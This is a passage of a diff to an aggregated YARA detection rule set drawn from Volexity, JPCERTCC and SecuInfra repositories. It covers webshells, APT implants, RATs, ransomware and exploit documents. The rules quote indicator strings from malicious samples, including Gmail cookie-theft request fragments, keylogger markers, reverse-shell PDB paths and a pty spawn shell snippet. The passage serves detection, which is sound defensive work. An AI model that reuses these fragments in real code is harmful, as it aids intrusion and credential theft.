XEGroup/indicators/yara.yar#L99-L129" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-07-28 SharpTongue SharpTongue Deploys Clever Mail-Stealing Browser Extension SHARPEXT/yara.yar#L1-L47" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - hash = "815d262d38a26d5695606d03d5a1a49b9c00915ead1d8a2c04eb47846100e93f" - logic_hash = "cabe7d17017c95943b7ae9d1827b3a5cb8ed3b02506222367498a73fec8d0914" + logic_hash = "0ed58c8646582ee36aeac650fac02d1e4962d45c0f6a24783c021d9267bed192" score = 75 quality = 80 - tags = "XEGROUP, FILE" + tags = "SHARPTONGUE" + hash1 = "1c9664513fe226beb53268b58b11dacc35b80a12c50c22b76382304badf4eb00" + hash2 = "6025c66c2eaae30c0349731beb8a95f8a5ba1180c5481e9a49d474f4e1bb76a4" + hash3 = "6594b75939bcdab4253172f0fa9066c8aee2fa4911bd5a03421aeb7edcd9c90c" memory_suitable = 1 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $pdb1 = "x:\\MultiOS_ReverseShell-master\\Multi-OS_ReverseShell\\obj\\Release\\XEReverseShell.pdb" - $pdb2 = "\\Release\\XEReverseShell.pdb" - $a1 = "RunServer" ascii - $a2 = "writeShell" ascii - $a3 = "GetIP" ascii - $b1 = "xequit" wide - $b2 = "setshell" wide + $s1 = "\"mode=attach&name=\"" ascii + $s2 = "\"mode=new&mid=\"" ascii + $s3 = "\"mode=attlist\"" ascii + $s4 = "\"mode=list\"" ascii + $s5 = "\"mode=domain\"" ascii + $s6 = "\"mode=black\"" ascii + $s7 = "\"mode=newD&d=\"" ascii + $mark1 = "chrome.runtime.onMessage.addListener" ascii + $mark2 = "chrome.webNavigation.onCompleted.addListener" ascii + $enc1 = "function BSue(string){" ascii + $enc2 = "function BSE(input){" ascii + $enc3 = "function bin2hex(byteArray)" ascii + $xhr1 = ".send(\"mode=cd1" ascii + $xhr2 = ".send(\"mode=black" ascii + $xhr3 = ".send(\"mode=domain" ascii + $xhr4 = ".send(\"mode=list" ascii + $manifest1 = "\"description\":\"advanced font\"," ascii + $manifest2 = "\"scripts\":[\"bg.js\"]" ascii + $manifest3 = "\"devtools_page\":\"dev.html\"" ascii condition: - any of ($pdb*) or (( all of ($a*) or all of ($b*)) and filesize <40KB) + (5 of ($s*) and all of ($mark*)) or all of ($enc*) or 3 of ($xhr*) or 2 of ($manifest*) } -import "pe" +rule VOLEXITY_Apt_Macos_Gimmick : STORMCLOUD +{ + meta: + description = "Detects the macOS port of the GIMMICK malware." + author = "threatintel@volexity.com" + id = "258a2bbe-7822-5f74-b4eb-8776ecb15b76" + date = "2021-10-18" + modified = "2022-03-22" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-03-22 GIMMICK/indicators/yara.yar#L1-L50" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "403ed1102fe5a99c0aacde02e0830f9c4fa194f10aec4a192f4abf6cde0de99d" + score = 75 + quality = 78 + tags = "STORMCLOUD" + hash1 = "2a9296ac999e78f6c0bee8aca8bfa4d4638aa30d9c8ccc65124b1cbfc9caab5f" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + memory_suitable = 1 -rule VOLEXITY_Trojan_Win_Pngexe : XEGROUP FILE + strings: + $s1 = "http://cgi1.apnic.net/cgi-bin/my-ip.php --connect-timeout 10 -m 20" wide ascii + $json1 = "base_json" ascii wide + $json2 = "down_json" ascii wide + $json3 = "upload_json" ascii wide + $json4 = "termin_json" ascii wide + $json5 = "request_json" ascii wide + $json6 = "online_json" ascii wide + $json7 = "work_json" ascii wide + $msg1 = "bash_pid: %d, FDS_CHILD: %d, FDS_PARENT: %d" ascii wide + $msg2 = "pid %d is dead" ascii wide + $msg3 = "exit with code %d" ascii wide + $msg4 = "recv signal %d" ascii wide + $cmd1 = "ReadCmdQueue" ascii wide + $cmd2 = "read_cmd_server_timer" ascii wide + $cmd3 = "enableProxys" ascii wide + $cmd4 = "result_block" ascii wide + $cmd5 = "createDirLock" ascii wide + $cmd6 = "proxyLock" ascii wide + $cmd7 = "createDirTmpItem" ascii wide + $cmd8 = "dowfileLock" ascii wide + $cmd9 = "downFileTmpItem" ascii wide + $cmd10 = "filePathTmpItem" ascii wide + $cmd11 = "uploadItems" ascii wide + $cmd12 = "downItems" ascii wide + $cmd13 = "failUploadItems" ascii wide + $cmd14 = "failDownItems" ascii wide + $cmd15 = "downloadCmds" ascii wide + $cmd16 = "uploadFiles" ascii wide + + condition: + $s1 or 5 of ($json*) or 3 of ($msg*) or 9 of ($cmd*) +} +rule VOLEXITY_Apt_Win_Gimmick_Dotnet_Base : STORMCLOUD { meta: - description = "Detects PNGEXE, a simple reverse shell loader." + description = "Detects the base version of GIMMICK in .NET." author = "threatintel@volexity.com" - id = "a0168176-6b2d-56ba-baaa-f011d9f5e3ad" - date = "2020-09-04" - modified = "2021-12-07" + id = "8723253f-ad11-509e-a9b4-f2c3258f9b5c" + date = "2020-03-16" + modified = "2022-03-22" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-12-06 - XEGroup/indicators/yara.yar#L132-L159" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-03-22 GIMMICK/indicators/yara.yar#L52-L76" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - hash = "72f7d4d3b9d2e406fa781176bd93e8deee0fb1598b67587e1928455b66b73911" - logic_hash = "05ab554eaf208ff0f5fde37b835c92e55bf0de21bd2700fdd31d81ba338cbdc7" + logic_hash = "0dd2aab308b7057d3075c792339af89d7ff9d617f1beb78ecdb725554defa5dc" score = 75 quality = 80 - tags = "XEGROUP, FILE" - hash2 = "4d913ecb91bf32fd828d2153342f5462ae6b84c1a5f256107efc88747f7ba16c" - memory_suitable = 0 + tags = "STORMCLOUD" + hash1 = "b554bfe4c2da7d0ac42d1b4f28f4aae854331fd6d2b3af22af961f6919740234" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + memory_suitable = 1 strings: - $a1 = "amd64.png" ascii - $a2 = "x86.png" ascii + $other1 = "srcStr is null" wide + $other2 = "srcBs is null " wide + $other3 = "Key cannot be null" wide + $other4 = "Faild to get target constructor, targetType=" wide + $other5 = "hexMoudule(public key) cannot be null or empty." wide + $other6 = "https://oauth2.googleapis.com/token" wide + $magic1 = "TWljcm9zb2Z0IUAjJCVeJiooKQ==" ascii wide + $magic2 = "DAE47700E8CF3DAB0@" ascii wide condition: - uint16(0)==0x5A4D and (( any of ($a*) and filesize >30KB and filesize <200KB) or pe.imphash()=="ca41f83b03cf3bb51082dbd72e3ba1ba" or pe.imphash()=="e93abc400902e72707edef1f717805f0" or pe.imphash()=="83a5d4aa20a8aca2a9aa6fc2a0aa30b0") + 5 of ($other*) or any of ($magic*) } -import "pe" - -rule VOLEXITY_Trojan_Win_Backwash_Iis : XEGROUP +rule VOLEXITY_Webshell_Jsp_Converge : WEBSHELL { meta: - description = "Variant of the BACKWASH malware family with IIS worm functionality." + description = "File upload webshell observed in incident involving compromise of Confluence server." author = "threatintel@volexity.com" - id = "08a86a58-32af-5c82-90d2-d6603dae8d63" - date = "2020-09-04" - modified = "2021-12-07" + id = "2a74678e-cb00-567c-a2e0-2e095f3e5ee8" + date = "2022-06-01" + modified = "2022-06-06" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-12-06 - XEGroup/indicators/yara.yar#L161-L184" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-02 Active Exploitation Of Confluence 0-day/indicators/yara.yar#L1-L15" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - hash = "98e39573a3d355d7fdf3439d9418fdbf4e42c2e03051b5313d5c84f3df485627" - logic_hash = "95a7f9e0afb031b49cd0da66b5a887d26ad2e06cce625bc45739b4a80e96ce9c" + logic_hash = "bb48516342eddd48c35e6db0eb74f95e116dc723503552b99ba721b5bdb391e5" score = 75 quality = 80 - tags = "XEGROUP" + tags = "WEBSHELL" memory_suitable = 1 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $a1 = "GetShell" ascii - $a2 = "smallShell" ascii - $a3 = "createSmallShell" ascii - $a4 = "getSites" ascii - $a5 = "getFiles " ascii - $b1 = "action=saveshell&domain=" ascii wide - $b2 = "&shell=backsession.aspx" ascii wide + $s1 = "if (request.getParameter(\"name\")!=null && request.getParameter(\"name\").length()!=0){" ascii condition: - all of ($a*) or any of ($b*) + $s1 } -rule VOLEXITY_Apt_Win_Bluelight_B : INKYSQUID +rule VOLEXITY_General_Jsp_Possible_Tiny_Fileuploader : GENERAL WEBSHELLS FILE { meta: - description = "North Korean origin malware which uses a custom Google App for c2 communications." + description = "Detects small .jsp files which have possible file upload utility." author = "threatintel@volexity.com" - id = "8dc51d15-d0ca-5307-ac00-5b20e4900655" - date = "2021-06-21" - modified = "2021-09-01" + id = "d111aab3-af6e-59cb-a445-ebd4a454fb9a" + date = "2022-06-01" + modified = "2022-06-06" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-08-17 - InkySquid Part 1/indicators/yara.yar#L1-L100" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-02 Active Exploitation Of Confluence 0-day/indicators/yara.yar#L17-L50" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "a6e83ca2ae15f1a7819f065449f84166da401739d091565605d62ebba3d47a50" + logic_hash = "bad62e6fd33ffb0d8551302fd7f85528066992c272b670d44a33b5b2eb174886" score = 75 - quality = 55 - tags = "INKYSQUID" - hash1 = "837eaf7b736583497afb8bbdb527f70577901eff04cc69d807983b233524bfed" + quality = 80 + tags = "GENERAL, WEBSHELLS, FILE" + hash1 = "4addb9bc9e5e1af8fda63589f6b3fc038ccfd651230fa3fa61814ad080e95a12" + memory_suitable = 0 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $magic = "host_name: %ls, cookie_name: %s, cookie: %s, CT: %llu, ET: %llu, value: %s, path: %ls, secu: %d, http: %d, last: %llu, has: %d" - $f1 = "%ls.INTEG.RAW" wide - $f2 = "edb.chk" ascii - $f3 = "edb.log" ascii - $f4 = "edbres00001.jrs" ascii - $f5 = "edbres00002.jrs" ascii - $f6 = "edbtmp.log" ascii - $f7 = "cheV01.dat" ascii - $chrome1 = "Failed to get chrome cookie" - $chrome2 = "mail.google.com, cookie_name: OSID" - $chrome3 = ".google.com, cookie_name: SID," - $chrome4 = ".google.com, cookie_name: __Secure-3PSID," - $chrome5 = "Failed to get Edge cookie" - $chrome6 = "google.com, cookie_name: SID," - $chrome7 = "google.com, cookie_name: __Secure-3PSID," - $chrome8 = "Failed to get New Edge cookie" - $chrome9 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0" - $chrome10 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8" - $chrome11 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s" - $chrome12 = "https://mail.google.com" - $chrome13 = "result.html" - $chrome14 = "GM_ACTION_TOKEN" - $chrome15 = "GM_ID_KEY=" - $chrome16 = "/mail/u/0/?ik=%s&at=%s&view=up&act=prefs" - $chrome17 = "p_bx_ie=1" - $chrome18 = "myaccount.google.com, cookie_name: OSID" - $chrome19 = "Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3" - $chrome20 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8" - $chrome21 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s" - $chrome22 = "https://myaccount.google.com" - $chrome23 = "result.html" - $chrome24 = "myaccount.google.com" - $chrome25 = "/_/AccountSettingsUi/data/batchexecute" - $chrome26 = "f.req=%5B%5B%5B%22BqLdsd%22%2C%22%5Btrue%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&at=" - $chrome27 = "response.html" - $msg1 = "https_status is %s" - $msg2 = "Success to find GM_ACTION_TOKEN and GM_ID_KEY" - $msg3 = "Failed to find GM_ACTION_TOKEN and GM_ID_KEY" - $msg4 = "Failed HttpSendRequest to mail.google.com" - $msg5 = "Success to enable imap" - $msg6 = "Failed to enable imap" - $msg7 = "Success to find SNlM0e" - $msg8 = "Failed to find SNlM0e" - $msg9 = "Failed HttpSendRequest to myaccount.google.com" - $msg10 = "Success to enable thunder access" - $msg11 = "Failed to enable thunder access" - $keylogger_component1 = "[TAB]" - $keylogger_component2 = "[RETURN]" - $keylogger_component3 = "PAUSE" - $keylogger_component4 = "[ESC]" - $keylogger_component5 = "[PAGE UP]" - $keylogger_component6 = "[PAGE DOWN]" - $keylogger_component7 = "[END]" - $keylogger_component8 = "[HOME]" - $keylogger_component9 = "[ARROW LEFT]" - $keylogger_component10 = "[ARROW UP]" - $keylogger_component11 = "[ARROW RIGHT]" - $keylogger_component12 = "[ARROW DOWN]" - $keylogger_component13 = "[INS]" - $keylogger_component14 = "[DEL]" - $keylogger_component15 = "[WIN]" - $keylogger_component16 = "[NUM *]" - $keylogger_component17 = "[NUM +]" - $keylogger_component18 = "[NUM ,]" - $keylogger_component19 = "[NUM -]" - $keylogger_component20 = "[NUM .]" - $keylogger_component21 = "NUM /]" - $keylogger_component22 = "[NUMLOCK]" - $keylogger_component23 = "[SCROLLLOCK]" - $keylogger_component24 = "Time: " - $keylogger_component25 = "Window: " - $keylogger_component26 = "CAPSLOCK+" - $keylogger_component27 = "SHIFT+" - $keylogger_component28 = "CTRL+" - $keylogger_component29 = "ALT+" + $required1 = "request." ascii + $required2 = "java.io.FileOutputStream" ascii + $required3 = ".write" ascii + $encoding1 = "java.util.Base64" ascii + $encoding2 = "crypto.Cipher" ascii + $encoding3 = ".misc.BASE64Decoder" ascii condition: - $magic or ( all of ($f*) and 5 of ($keylogger_component*)) or 24 of ($chrome*) or 4 of ($msg*) or 27 of ($keylogger_component*) + ( filesize <4KB and all of ($required*) and any of ($encoding*)) or ( filesize <600 and all of ($required*)) } -rule VOLEXITY_Apt_Win_Bluelight : INKYSQUID +rule VOLEXITY_Webshell_Java_Realcmd : COMMODITY WEBSHELLS { meta: - description = "The BLUELIGHT malware family. Leverages Microsoft OneDrive for network communications." + description = "Detects the RealCMD webshell, one of the payloads for BEHINDER." author = "threatintel@volexity.com" - id = "3ec2d44c-4c08-514d-a839-acef3f53f7dc" - date = "2021-04-23" - modified = "2021-09-01" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-08-17 - InkySquid Part 1/indicators/yara.yar#L102-L132" + id = "d5e7e3c8-a0aa-5c2e-8a2d-654e066593eb" + date = "2022-06-01" + modified = "2022-06-06" + reference = "https://github.com/Freakboy/Behinder/blob/master/src/main/java/vip/youwe/sheller/payload/java/RealCMD.java" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2022/2022-06-02 Active Exploitation Of Confluence 0-day/indicators/yara.yar#L52-L79" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "52589348f42aadbe453ad8a40ac36b58fcc9e07cd298486f09b6f793823d8cc7" + logic_hash = "244add844570b23e5df23882a3fdacf894f3e201b01373d949b0752361960536" score = 75 quality = 80 - tags = "INKYSQUID" - hash1 = "7c40019c1d4cef2ffdd1dd8f388aaba537440b1bffee41789c900122d075a86d" - hash2 = "94b71ee0861cc7cfbbae53ad2e411a76f296fd5684edf6b25ebe79bf6a2a600a" + tags = "COMMODITY, WEBSHELLS" + hash1 = "a9a30455d6f3a0a8cd0274ae954aa41674b6fd52877fafc84a9cb833fd8858f6" + memory_suitable = 1 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $pdb1 = "\\Development\\BACKDOOR\\ncov\\" - $pdb2 = "Release\\bluelight.pdb" - $msg0 = "https://ipinfo.io" fullword - $msg1 = "country" fullword - $msg5 = "\"UserName\":\"" fullword - $msg7 = "\"ComName\":\"" fullword - $msg8 = "\"OS\":\"" fullword - $msg9 = "\"OnlineIP\":\"" fullword - $msg10 = "\"LocalIP\":\"" fullword - $msg11 = "\"Time\":\"" fullword - $msg12 = "\"Compiled\":\"" fullword - $msg13 = "\"Process Level\":\"" fullword - $msg14 = "\"AntiVirus\":\"" fullword - $msg15 = "\"VM\":\"" fullword + $fn1 = "runCmd" wide ascii fullword + $fn2 = "RealCMD" ascii wide fullword + $fn3 = "buildJson" ascii wide fullword + $fn4 = "Encrypt" ascii wide fullword + $s1 = "AES/ECB/PKCS5Padding" ascii wide + $s2 = "python -c 'import pty; pty.spawn" ascii wide + $s3 = "status" ascii wide + $s4 = "success" ascii wide + $s5 = "sun.jnu.encoding" ascii wide + $s6 = "java.util.Base64" ascii wide condition: - any of ($pdb*) or all of ($msg*) + all of ($fn*) or all of ($s*) } /* * YARA Rule Set * Repository Name: JPCERTCC * Repository: https://github.com/JPCERTCC/MalConfScan/ - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: 19ec0d145535a6a4cfd37c0960114f455a8c343e * Number of Rules: 30 * Skipped: 0 (age), 4 (quality), 0 (score), 0 (importance) @@ -204906,7 +206774,7 @@ rule JPCERTCC_Elf_Wellmess : FILE * YARA Rule Set * Repository Name: SecuInfra * Repository: https://github.com/SIFalcon/Detection - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: 2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd * Number of Rules: 45 * Skipped: 0 (age), 11 (quality), 0 (score), 0 (importance) @@ -204916,92 +206784,181 @@ rule JPCERTCC_Elf_Wellmess : FILE * * NO LICENSE SET */ -import "math" -import "pe" -import "console" +rule SECUINFRA_SUSP_Scheduled_Tasks_Create_From_Susp_Dir : FILE +{ + meta: + description = "Detects a PowerShell Script that creates a Scheduled Task that runs from an suspicious directory" + author = "SECUINFRA Falcon Team" + id = "65aad597-c5fe-50c3-8970-19fb502f1602" + date = "2022-02-21" + modified = "2022-02-27" + reference = "https://github.com/SIFalcon/Detection" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Windows/windows_misc.yar#L2-L25" + license_url = "N/A" + logic_hash = "abe0592a8936898a43a1df9039829948f8a4a425c74cb970d2899d513c9cfffe" + score = 60 + quality = 25 + tags = "FILE" + version = "0.1" -rule SECUINFRA_RANSOM_Lockbit_Black_Packer : RANSOMWARE FILE + strings: + $create = "New-ScheduledTaskAction" + $execute = "-Execute" + $trigger = "New-ScheduledTaskTrigger" + $at_param = "-At" + $register = "Register-ScheduledTask" + $action = "-Action" + $path1 = "C:\\ProgramData\\" + $path2 = "C:\\Windows\\Temp" + $path3 = "AppData\\Local" + + condition: + filesize <30KB and 1 of ($path*) and ($create and $execute) or ($trigger and $at_param) or ($register and $action) +} +rule SECUINFRA_SUSP_Reverse_Run_Key : FILE { meta: - description = "Detects the packer used by Lockbit Black (Version 3)" + description = "Detects a Reversed Run Key" author = "SECUINFRA Falcon Team" - id = "f4c1a12b-eb89-5a46-97a9-f0207ca1bbde" - date = "2022-07-04" - modified = "2022-07-04" - reference = "https://twitter.com/vxunderground/status/1543661557883740161" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Lockbit_Black_Packer.yar#L5-L40" + id = "230bed16-278e-574c-bb9b-cf6c44a7e9cd" + date = "2022-02-27" + modified = "2022-02-27" + reference = "https://github.com/SIFalcon/Detection" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Windows/windows_misc.yar#L27-L38" license_url = "N/A" - logic_hash = "cde7f5374b97b2462cfd951994b6bb3ef0962e1be71253e25ca14d53c3d3d615" + logic_hash = "dcb1a7e2c688287d08ade3d75e5c3d0dde6b645889bd4ec09ce8c131d8d3265e" + score = 65 + quality = 70 + tags = "FILE" + + strings: + $run = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide + + condition: + filesize <100KB and $run +} +import "console" + +rule SECUINFRA_HUNT_RTF_CVE_2023_21716_Mar23 : CVE_2023_21716 +{ + meta: + description = "Detects RTF documents with an inflated fonttable. Hunting for CVE-2023-21716" + author = "SECUINFRA Falcon Team (@SI_FalconTeam)" + id = "1b76f428-f2a8-5d1d-a78c-b4a70ac4f5db" + date = "2023-03-07" + modified = "2023-03-07" + reference = "https://www.bleepingcomputer.com/news/security/proof-of-concept-released-for-critical-microsoft-word-rce-bug/" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Hunting/HUNT_RTF_CVE_2023_21716.yar#L3-L20" + license_url = "N/A" + logic_hash = "456008db725b8348f9f3851bb9aae9990e7613e1b9056846b121605c3e080297" + score = 50 + quality = 70 + tags = "CVE-2023-21716" + tlp = "CLEAR" + + strings: + $fonttbl_len = /\\fonttbl\{.{1,10}\;\}(\s.{1,10}\}){10,}/ + + condition: + uint32be(0x0)==0x7B5C7274 and !fonttbl_len[1]>256 and console.log("[!] Inflated fonttable with length: ",!fonttbl_len[1]) +} +import "dotnet" +import "pe" + +rule SECUINFRA_APT_Bitter_Maldoc_Verify : CVE_2018_0798 +{ + meta: + description = "Detects Bitter (T-APT-17) shellcode in oleObject (CVE-2018-0798)" + author = "SECUINFRA Falcon Team (@SI_FalconTeam)" + id = "8e0e32d3-f00e-5145-9386-f42ddca703ae" + date = "2022-06-01" + modified = "2022-07-05" + reference = "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/APT/APT_Bitter_T-APT-17.yar#L11-L40" + license_url = "N/A" + logic_hash = "1d30e2ad0d99d274a4e3dd029ff41ec05e8ba4160bea37762bce1bb5286493d8" score = 75 - quality = 45 - tags = "RANSOMWARE, FILE" + quality = 70 + tags = "CVE-2018-0798" tlp = "WHITE" - hash0 = "80e8defa5377018b093b5b90de0f2957f7062144c83a09a56bba1fe4eda932ce" - hash1 = "506f3b12853375a1fbbf85c82ddf13341cf941c5acd4a39a51d6addf145a7a51" - hash2 = "d61af007f6c792b8fb6c677143b7d0e2533394e28c50737588e40da475c040ee" + hash0 = "0c7158f9fc2093caf5ea1e34d8b8fffce0780ffd25191fac9c9b52c3208bc450" + hash1 = "bd0d25194634b2c74188cfa3be6668590e564e6fe26a6fe3335f95cbc943ce1d" + hash2 = "3992d5a725126952f61b27d43bd4e03afa5fa4a694dca7cf8bbf555448795cd6" strings: - $sectionname0 = ".rdata$zzzdbg" ascii - $sectionname1 = ".xyz" ascii fullword - $check0 = {3d 75 80 91 76 ?? ?? 3d 1b a4 04 00 ?? ?? 3d 9b b4 84 0b} - $check1 = {3d 75 ba 0e 64} - $asciiCalc = {66 83 f8 41 ?? ?? 66 83 f8 46 ?? ?? 66 83 e8 37} + $xor_string0 = "LoadLibraryA" xor + $xor_string1 = "urlmon.dll" xor + $xor_string2 = "Shell32.dll" xor + $xor_string3 = "ShellExecuteA" xor + $xor_string4 = "MoveFileA" xor + $xor_string5 = "CreateDirectoryA" xor + $xor_string6 = "C:\\Windows\\explorer" xor + $padding = {000001128341000001128341000001128342000001128342} condition: - uint16(0)==0x5a4d and filesize >111KB and filesize <270KB and all of ($sectionname*) and any of ($check*) and $asciiCalc and for any i in (0..pe.number_of_sections-1) : (math.entropy(pe.sections[i].raw_data_offset,pe.sections[i].raw_data_size)>7.9 and (pe.sections[i].name==".text" or pe.sections[i].name==".data" or pe.sections[i].name==".pdata") and console.log("High Entropy section found:",pe.sections[i].name)) + 3 of ($xor_string*) and $padding } -rule SECUINFRA_RANSOM_Magniber_LNK_Jan23 +import "dotnet" +import "pe" + +rule SECUINFRA_APT_Bitter_Almond_RAT : FILE { meta: - description = "Detects Magniber Ransomware LNK files from fake Windows Update delivery method" - author = "SECUINFRA Falcon Team" - id = "2459a9e9-a6bb-50fc-9920-7632fdec7e91" - date = "2023-01-13" - modified = "2023-01-13" - reference = "https://twitter.com/SI_FalconTeam/status/1613540054382559234" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Magniber_LNK_Jan23.yar#L1-L18" + description = "Detects Bitter (T-APT-17) Almond RAT (.NET)" + author = "SECUINFRA Falcon Team (@SI_FalconTeam)" + id = "191fadf9-4f64-56c9-bc2a-a7b4e27ab0fc" + date = "2022-06-01" + modified = "2022-07-05" + reference = " https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/APT/APT_Bitter_T-APT-17.yar#L82-L108" license_url = "N/A" - hash = "16ecec4efa2174dec11f6a295779f905c8f593ab5cc96ae0f5249dc50469841c" - logic_hash = "074611d74e382bb19a45b052b5b2cc186bf3667420cb1625e9bda37f2e9774c5" + hash = "55901c2d5489d6ac5a0671971d29a31f4cdfa2e03d56e18c1585d78547a26396" + logic_hash = "b8d6b95987fe434fc16c87a7bc144f1fe69301a32bb93588df7c2abbfef62d75" score = 75 quality = 70 - tags = "" - tlp = "CLEAR" + tags = "FILE" + tlp = "WHITE" strings: - $netbiosName = "victim1" ascii fullword - $macAddress = {00 0C 29 07 E1 6D} + $function0 = "GetMacid" ascii + $function1 = "StartCommWithServer" ascii + $function2 = "sendingSysInfo" ascii + $dbg0 = "*|END|*" wide + $dbg1 = "FILE>" wide + $dbg2 = "[Command Executed Successfully]" wide condition: - uint32be(0x0)==0x4C000000 and all of them + uint16(0)==0x5a4d and dotnet.version=="v4.0.30319" and filesize >12KB and filesize <68KB and any of ($function*) and any of ($dbg*) } -rule SECUINFRA_RANSOM_Magniber_ISO_Jan23 : FILE +import "dotnet" +import "pe" + +rule SECUINFRA_APT_Bitter_PDB_Paths : FILE { meta: - description = "Detects Magniber Ransomware ISO files from fake Windows Update delivery method" - author = "SECUINFRA Falcon Team" - id = "6d5a937d-ac31-5c59-8e93-3fadc772d132" - date = "2023-01-13" - modified = "2023-01-13" - reference = "https://twitter.com/SI_FalconTeam/status/1613540054382559234" - source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/Malware/RANSOM_Magniber_ISO_Jan23.yar#L1-L24" + description = "Detects Bitter (T-APT-17) PDB Paths" + author = "SECUINFRA Falcon Team (@SI_FalconTeam)" + id = "e2ad4ac3-45fe-5087-b0d6-a5de16774229" + date = "2022-06-22" + modified = "2022-07-05" + reference = "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh" + source_url = "https://github.com/SIFalcon/Detection/blob/2d7c66d7d16c7541bf2a9a83a7a6d334364a26fd/Yara/APT/APT_Bitter_T-APT-17.yar#L110-L133" license_url = "N/A" - hash = "4dcbcc070e7e3d0696c777b63e185406e3042de835b734fe7bb33cc12e539bf6" - logic_hash = "238baa794f4a87102534f7d6901819aa1b5dbb8156d56fb311e9fb1a6bc77f30" + logic_hash = "7eb9e4c1b4e0cca070596f3702045756eb32716481bb59f2f8322221804291f5" score = 75 - quality = 68 + quality = 70 tags = "FILE" - tlp = "CLEAR" + tlp = "WHITE" + hash0 = "55901c2d5489d6ac5a0671971d29a31f4cdfa2e03d56e18c1585d78547a26396" strings: - $magic = {43 44 30 30 31} - $tool = {55 4C 54 52 41 49 53 4F 00 39 2E 37 2E 36 2E 33 38 32 39} - $msiMagic = {D0 CF 11 E0 A1 B1 1A E1} - $dosString = "!This program cannot be run in DOS mode" ascii - $lnkMagic = {4C 00 00 00} + $pdbPath0 = "C:\\Users\\Window 10 C\\Desktop\\COMPLETED WORK\\" ascii + $pdbPath1 = "stdrcl\\stdrcl\\obj\\Release\\stdrcl.pdb" + $pdbPath2 = "g:\\Projects\\cn_stinker_34318\\" + $pdbPath3 = "renewedstink\\renewedstink\\obj\\Release\\stimulies.pdb" condition: - filesize >200KB and filesize <800KB and all of them + uint16(0)==0x5a4d and any of ($pdbPath*) } rule SECUINFRA_RANSOM_Esxiargs_Ransomware_Encryptor_Feb23 { @@ -205095,28 +207052,46 @@ rule SECUINFRA_RANSOM_Medusalocker_July22 : RANSOMWARE FILE condition: uint16(0)==0x5a4d and pe.imphash()=="1a395bd10b20c116b11c2db5ee44c225" and filesize >450KB and filesize <1MB and all of ($log*) and $mutex and any of 